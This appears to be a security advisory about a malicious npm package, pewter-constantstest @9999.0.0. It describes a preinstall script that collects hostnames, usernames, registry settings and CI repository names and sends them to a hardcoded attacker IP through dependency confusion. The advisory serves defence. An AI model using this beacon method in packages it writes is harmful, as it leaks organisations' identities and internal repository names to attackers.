pewter-constantstest @9999.0.0

Summary

On npm install , the preinstall script callback.js collects the installer's hostname, OS username, current working directory, npm registry configuration, and CI repository identifiers from a broad list of CI environment variables (GITHUB_REPOSITORY, CI_PROJECT_PATH, BUILD_REPOSITORY_NAME, BITBUCKET_REPO_FULL_NAME, TRAVIS_REPO_SLUG, DRONE_REPO, BUILDKITE_PIPELINE_SLUG, CIRCLE_PROJECT_REPONAME, JOB_NAME) and transmits them via plaintext HTTP GET to the hardcoded bare IP http://75.119.137.232:31337/depconfuse . The package has no functional surface: index.js exports an empty object, the description is the generic Shared utility helpers. , the README is 48 bytes, and the version is 9999.0.0 — the canonical dependency-confusion override version designed to win resolution against an internal package of the same name. The package exists solely to fire the beacon when an organization accidentally resolves this public name in place of a private/internal package, leaking the victim's identity and internal repo names to the attacker for follow-on targeting.

Source: amazon-inspector (050b19d8dad7c8c1a626c953493c23b375e434128f38950625f82b0fb244eabe)